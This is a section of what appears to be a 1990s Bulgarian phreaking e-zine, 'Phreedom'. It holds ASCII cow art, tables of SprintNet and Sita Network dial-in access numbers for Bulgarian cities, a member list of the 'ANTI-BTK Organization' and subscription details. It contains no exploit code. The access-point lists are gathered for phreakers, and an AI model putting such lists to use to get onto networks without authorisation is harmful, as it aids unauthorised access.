\ º º //³³ÄÄÄij³\\ * //ÄÄÄÄÄÄ\\ * \\ÄÄ// * \\ÄÄÄÄ\\ º º ^ ^^ ^^ ^ ^ ^ ^ ^ ^ ^ º º Cow walking Cow jogging Same cow Cow breaking º º º º º º (__) º º (oo) (__) o * (__) º º \/ (oo)/ " ³ (oo) º º ____³ \____ /ÄÄÄÄÄÄÄ\/(__ oÍoÍoͳÄÄÄÄÄÄ\/ º º ÄÄÄ/ ÄÄ** / ³ / ³ ³ º º *____/ ³___// * ³³ÄÄÄij³ ³³ÄÄÄij³ º º //ÄÄÄÄÄÄÄÄ/ ^^ ^^ ^^ ^^ º º //__ Cow Cow pooing º º Cow marching standing º º º º º º (___) º º ( ÄÄ º º \_ ³ Ä G'nite, and thank you for your support. Zzz z z z z z z z º º \O º º º Ç Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä¶ º º º Telefonen Ukazatel By:EXo º º ÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄ ÄÍÍÍÍÄ º º º º Nqma nuvda da obqsnqwam kakwo e SprintNet ili Sita Network i poneveº ºwsichki, znaem za problemite pri swyrzwaneto kym tqh wyw wseki poreden brojº ºna Phreedom ste publikuwame izwesniq ni pylen spisyk na whodnite tochki naº ºdwete sistemi za cqlata strana i stolicata. Ako imate informaciq za whodniº ºtochki, koito ne sa wkliuchini w po-dolnite tablici, ili promqna wº ºostanalite poleta movete winagi da izpratite edin byrz e-mail naº ºphreedom.ap@usa.net. Predwaritelno 10x. º º º º SprintNet º º ÄÍÍÍÍÍÍÍÄ º º º º Area Code 779 City Code Phone Number Connection Speed º º ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º º Burgas*+ 0133 Up to 9600bps º º Burgas+ 56 99626 Up to 9600bps º º Interpred(Sofia)*+ 0133 Up to 9600bps º º Interpred(Sofia)+ 2 7146-4444 Up to 14400bps º º Plovdiv+ 32 264-497 Up to 9600bps º º Russe*+ 0133 Up to 9600bps º º Sofia*+ 0133 Up to 14400bps º º Sofia+ 2 91-129 Up to 14400bps º º Sofia 2 9807045 Up to 14400bps º º Sofia 2 73366/7/8 Up to 14400bps º º Stara Zagora*+ 0133 Up to 9600bps º º Veliko Tarnovo*+ 0133 Up to 9600bps º º Varna*+ 0133 Up to 9600bps º º Varna+ 52 601842 Up to 14400bps º º Vratza*+ 0133 Up to 9600bps º º º º º º * Izbira se samo ot selistata w regiona na grada. º º + Whodnite Dial-in proceduri sa po-razlichni ot standartnite SprintNet º º proceduri º º º º Zabelevki: 1) W stojnostite na Connect Speed move da ima promqna ! º º 2) Dostyp do SprintNet ot wsichki ostanali gradowe stawa prezº º telefon 0133, kojto igrae rolqta na wektor pri nasochwaneº º na razgowora kym naj-blizkata dial-in liniq. º º º º Sita Network (SCITOR) º º ÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄ º º º º Area Bulgaria City Code Phone Number Connection Speed º º ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º º Bourgas 56 800501 300-9600bps º º Sofia 2 9712266 1200-28,800bps º º Sofia 2 9712289 1200-28,800bps º º Sofia 2 9712665 1200-28,800bps º º Sofia 2 9712691 1200-28,800bps º º Vrajdebna 2 709145/6/7 300-9600bps º º Varna 52 650702 300-9600bps º º º º Zabelevka: 1) W stojnostite na Connect Speed move da ima promqna ! º º º Ç Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä¶ º º º Ú¿Ú¿ Ú ÉÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ»º º ³³³³embers ³ ist of ANTI-BTK Organization... ³ Wseki, kojto velae move ³º º ÀÀÙÙ ÀÄÄ ³ da stane chlen na ³º º ³ ANTI-BTK ³º º Maniax Killerian - Founder Ã Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä ´º º EXo - Glawen Redaktor na Phreedom ³ Prastajte zaqwki na ³º º ³ Phreedom.ap@usa.net ³º º ÈÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄͼº º Ķ Other - in alphabetical order ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º º º º BlackByte Xtreme º º Chaos Maker H4ck3r º º CuMeoHoB HoJo º º Defekt IronCode º º DJOK Master of Magic º º Dark Lord Pfloyd º º Dr. Flip Flop RinBP º º Ender S º º FireBall Sauron Mordorski º º FlyMan Star Gruhtar a.k.a oXyGenE º º Fufi Stoma º º JOJO The Saint º º Haz Ultra Violet º º º Ç Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä¶ º º º _ º º Where to find Phreedom ? ÀÂÂÄÁ¿ . . * ` \ . . º º ÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄ ´ à ¿ . __* *| \ . º º à ³ ´ ___*___* / º º www.ancient.pain.nat.bg ÚÁ´ ÚÁÄÙ . . __*- |*- . . º º à ³ *- | * , º º ili ÀÂÁÂÁ¿ . * , = a | n º º ÚÙ Ã * n c | e n t . . º º mailto:Phreedom.ap@usa.net À ´ . . EXo º º subject:Subscribe Phreedom ÃÄ¿ -=========================- º þ ÚÁÁ þ ù ù ú ú